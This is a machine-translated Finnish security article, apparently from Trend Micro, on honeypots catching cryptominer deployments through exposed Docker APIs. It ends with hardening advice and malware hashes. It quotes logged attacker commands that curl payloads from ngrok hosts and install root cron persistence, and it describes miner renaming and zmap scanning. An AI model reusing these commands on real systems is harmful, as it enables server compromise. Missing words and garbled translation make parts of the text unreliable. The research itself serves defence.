Analysoimme kerätyt tiedot honeypot-säiliöillä, jotka loimme uhkien jäljittämiseksi. Ja havaitsimme merkittävää toimintaa ei-toivotuilta tai luvattomista kryptovaluutan kaivostyöntekijöistä, jotka on otettu käyttöön rikoskonttiina käyttämällä yhteisön julkaisemaa kuvaa Docker Hubissa. Kuvaa käytetään osana palvelua, joka toimittaa haitallisia kryptovaluuttakaivostyöntekijöitä.
Lisäksi asennetaan verkkojen kanssa työskentelyyn tarkoitettuja ohjelmia tunkeutumaan avoimiin viereisiin säiliöihin ja sovelluksiin.
Jätämme hunajapurumme sellaisinaan, eli oletusasetuksiin ilman turvatoimenpiteitä tai myöhempää lisäohjelmiston asennusta. Huomaa, että Dockerilla on suosituksia alkuasennuksesta virheiden ja yksinkertaisten haavoittuvuuksien välttämiseksi. Mutta käytetyt hunajaruukut ovat kontteja, jotka on suunniteltu havaitsemaan konttialustaan kohdistuvat hyökkäykset, ei konttien sisällä olevia sovelluksia.
Havaittu haitallinen toiminta on myös huomionarvoista, koska se ei vaadi haavoittuvuuksia ja on myös riippumaton Docker-versiosta. Väärin määritetyn ja siksi avoimen säilökuvan löytäminen on kaikki mitä hyökkääjät tarvitsevat tartuttaakseen monia avoimia palvelimia.
Suljettoman Docker-sovellusliittymän avulla käyttäjä voi suorittaa monenlaisia , mukaan lukien luettelon saaminen käynnissä olevista säilöistä, lokien hakeminen tietystä säilöstä, käynnistäminen, pysäyttäminen (mukaan lukien pakotettu) ja jopa uuden säilön luominen tietystä kuvasta määritetyillä asetuksilla.
Vasemmalla on haittaohjelmien toimitustapa. Oikealla on hyökkääjän ympäristö, joka mahdollistaa kuvien etäkäytön.
3762 avoimen Docker-sovellusliittymän jakelu maittain. Perustuu Shodan-hakuun, joka on päivätty 12.02.2019
Hyökkäysketju- ja hyötykuormavaihtoehdot
Haitallista toimintaa ei havaittu vain hunajaruukkujen avulla. Shodanin tiedot osoittavat, että paljastuneiden Docker-sovellusliittymien määrä (katso toinen kaavio) on kasvanut sen jälkeen, kun tutkimme väärin konfiguroitua säilöä, jota käytettiin siltana Moneron kryptovaluutan louhintaohjelmiston käyttöönottamiseksi. Viime vuoden lokakuussa (2018, nykyiset tiedot noin kääntäjä) oli vain 856 avointa sovellusliittymää.
Hunajapottilokien tarkastelu osoitti, että konttien kuvien käyttö liittyi myös mm , työkalu suojattujen yhteyksien luomiseen tai liikenteen välittämiseen julkisista pisteistä tiettyihin osoitteisiin tai resursseihin (esimerkiksi localhost). Tämän ansiosta hyökkääjät voivat luoda dynaamisesti URL-osoitteita toimitettaessa hyötykuormaa avoimelle palvelimelle. Alla on koodiesimerkkejä lokeista, jotka osoittavat ngrok-palvelun väärinkäytön:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Kuten näet, ladatut tiedostot ladataan jatkuvasti muuttuvista URL-osoitteista. Näillä URL-osoitteilla on lyhyt viimeinen voimassaolopäivä, joten hyötykuormia ei voi ladata vanhenemispäivän jälkeen.
Hyötykuormavaihtoehtoja on kaksi. Ensimmäinen on käännetty ELF Miner Linuxille (määritelty nimellä Coinminer.SH.MALXMR.ATNO), joka muodostaa yhteyden kaivospooliin. Toinen on komentosarja (TrojanSpy.SH.ZNETMAP.A), joka on suunniteltu hankkimaan tiettyjä verkkotyökaluja, joita käytetään verkkoalueiden skannaamiseen ja uusien kohteiden etsimiseen.
dropper-skripti asettaa kaksi muuttujaa, joita sitten käytetään kryptovaluutan kaivostyökalun käyttöönotossa. HOST-muuttuja sisältää URL-osoitteen, jossa haitalliset tiedostot sijaitsevat, ja RIP-muuttuja on käyttöön otettavan kaivosohjelman tiedoston nimi (itse asiassa hash). HOST-muuttuja muuttuu aina, kun hash-muuttuja muuttuu. Skripti yrittää myös tarkistaa, ettei muita kryptovaluutan louhijia ole käynnissä hyökkäyksen kohteena olevassa palvelimessa.
Esimerkkejä HOST- ja RIP-muuttujista sekä koodinpätkä, jota käytetään tarkistamaan, ettei muita kaivostyöntekijöitä ole käynnissä
Ennen kaivostyön käynnistämistä se nimetään uudelleen nginxiksi. Muut tämän skriptin versiot nimeävät kaivosohjelman uudelleen muiksi laillisiksi palveluiksi, joita voi olla Linux-ympäristöissä. Tämä riittää yleensä ohittamaan käynnissä olevien prosessien luettelon tarkistukset.
Hakukirjoituksessa on myös ominaisuuksia. Se toimii saman URL-palvelun kanssa tarvittavien työkalujen käyttöönottamiseksi. Niiden joukossa on zmap-binaari, jota käytetään verkkojen skannaamiseen ja luettelon saamiseen avoimista porteista. Komentosarja lataa myös toisen binaarin, jota käytetään vuorovaikutukseen löydettyjen palvelujen kanssa ja vastaanottamaan niistä bannereita, jotka määrittävät lisätietoa löydetystä palvelusta (esimerkiksi sen versiosta).
Komentosarja määrittää myös ennalta jotkin verkkoalueet tarkistettaviksi, mutta tämä riippuu komentosarjan versiosta. Se myös asettaa kohdeportit palveluista – tässä tapauksessa Dockerista – ennen tarkistuksen suorittamista.
Heti kun mahdolliset kohteet löydetään, bannerit poistetaan niistä automaattisesti. Skripti myös suodattaa kohteita kiinnostavien palveluiden, sovellusten, komponenttien tai alustojen mukaan: Redis, Jenkins, Drupal, MODX, , Docker 1.16 -asiakasohjelma ja Apache CouchDB. Jos tarkistettu palvelin vastaa jotakin niistä, se tallennetaan tekstitiedostoon, jota hyökkääjät voivat myöhemmin käyttää myöhempään analysointiin ja hakkerointiin. Nämä tekstitiedostot ladataan hyökkääjien palvelimille dynaamisten linkkien kautta. Toisin sanoen jokaiselle tiedostolle käytetään erillistä URL-osoitetta, mikä tarkoittaa, että myöhempi pääsy on vaikeaa.
Hyökkäysvektori on Docker-kuva, kuten kahdesta seuraavasta koodinpalasta näkyy.
Yläosassa on nimeäminen lailliseksi palveluksi, ja alareunassa on kuinka zmap-ohjelmaa käytetään verkkojen skannaukseen
Yläreunassa ovat ennalta määritetyt verkkoalueet, alareunassa tietyt portit palveluiden, mukaan lukien Docker, etsimistä varten
Kuvakaappaus osoittaa, että alppikiharakuva on ladattu yli 10 miljoonaa kertaa
Perustuu Alpine Linuxiin ja curliin, resurssitehokkaaseen CLI-työkaluun tiedostojen siirtämiseen eri protokollien kautta. . Kuten edellisestä kuvasta näet, tämä kuva on ladattu jo yli 10 miljoonaa kertaa. Suuri määrä latauksia saattaa tarkoittaa tämän kuvan käyttämistä sisääntulopisteenä; tämä kuva päivitettiin yli kuusi kuukautta sitten; käyttäjät eivät lataaneet muita kuvia tästä arkistosta niin usein. Dockerissa - joukko ohjeita, joita käytetään säilön määrittämiseen suorittamaan sitä. Jos aloituspisteen asetukset ovat virheelliset (esimerkiksi kontti jätetään auki Internetistä), kuvaa voidaan käyttää hyökkäysvektorina. Hyökkääjät voivat käyttää sitä hyötykuorman toimittamiseen, jos he löytävät väärin määritellyn tai avoimen kontin, jota ei tueta.
On tärkeää huomata, että tämä kuva (alppikihara) itsessään ei ole haitallinen, mutta kuten yllä näkyy, sitä voidaan käyttää haitallisten toimintojen suorittamiseen. Samanlaisia Docker-kuvia voidaan käyttää myös haitallisten toimintojen suorittamiseen. Otimme yhteyttä Dockeriin ja työskentelimme heidän kanssaan tämän asian parissa.
Suositukset
jäännökset monille yrityksille, erityisesti niille, jotka toteuttavat , joka keskittyy nopeaan kehitykseen ja toimitukseen. Kaikkea pahentaa tarve noudattaa auditointi- ja valvontasääntöjä, tarve valvoa tietojen luottamuksellisuutta sekä niiden noudattamatta jättämisestä aiheutuvat valtavat vahingot. Tietoturvaautomaation sisällyttäminen kehityksen elinkaareen auttaa sinua löytämään tietoturva-aukkoja, jotka saattaisivat muuten jäädä huomaamatta, mutta myös vähentämään tarpeetonta työmäärää, kuten suorittamaan lisäohjelmistoversioita jokaista löydettyä haavoittuvuutta tai virheellistä kokoonpanoa varten sovelluksen käyttöönoton jälkeen.
Tässä artikkelissa käsitelty tapaus korostaa tarvetta ottaa turvallisuus huomioon alusta alkaen, mukaan lukien seuraavat suositukset:
- Järjestelmänvalvojille ja kehittäjille: Tarkista aina API-asetuksesi varmistaaksesi, että kaikki on määritetty hyväksymään pyynnöt vain tietystä palvelimesta tai sisäisestä verkosta.
- Noudata vähiten oikeuksien periaatetta: varmista, että säilön kuvat on allekirjoitettu ja varmistettu, rajoita pääsy kriittisiin komponentteihin (säilön käynnistyspalvelu) ja lisää verkkoyhteyksiin salaus.
- Seuraa ja mahdollistaa turvamekanismit, esim. ja sisäänrakennettu .
- Käytä ajonaikaisten ja kuvien automaattista tarkistusta saadaksesi lisätietoja säilössä suoritettavista prosesseista (esimerkiksi huijauksen havaitsemiseksi tai haavoittuvuuksien etsimiseksi). Sovellusten ohjaus ja eheyden valvonta auttavat seuraamaan epänormaaleja muutoksia palvelimissa, tiedostoissa ja järjestelmäalueilla.
Trendmicro auttaa DevOps-tiimejä rakentamaan turvallisesti, ottamaan käyttöön nopeasti ja käynnistämään missä tahansa. Trend Micro Tarjoaa tehokkaan, virtaviivaistetun ja automatisoidun tietoturvan organisaation DevOps-putkistossa ja tarjoaa useita uhkien suojauksia suojaamaan fyysisiä, virtuaalisia ja pilvityökuormia ajon aikana. Se lisää myös kontin turvallisuutta и , jotka skannaavat Docker-säilökuvat haittaohjelmien ja haavoittuvuuksien varalta missä tahansa kehitysprosessin vaiheessa uhkien estämiseksi ennen niiden käyttöönottoa.
Kompromissin merkkejä
Aiheeseen liittyvät tiivisteet:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Päälle Harjoittelevat kaiuttimet näyttävät, mitkä asetukset on ensin tehtävä, jotta yllä kuvatun tilanteen todennäköisyys voidaan minimoida tai välttää kokonaan. Ja 19-21 elokuuta online-intensiivissä Näistä ja vastaavista turvallisuusongelmista voit keskustella kollegoiden ja harjoittelevien opettajien kanssa pyöreän pöydän ääressä, jossa jokainen voi puhua ja kuunnella kokeneiden työtovereiden kipuja ja onnistumisia.
Lähde: will.com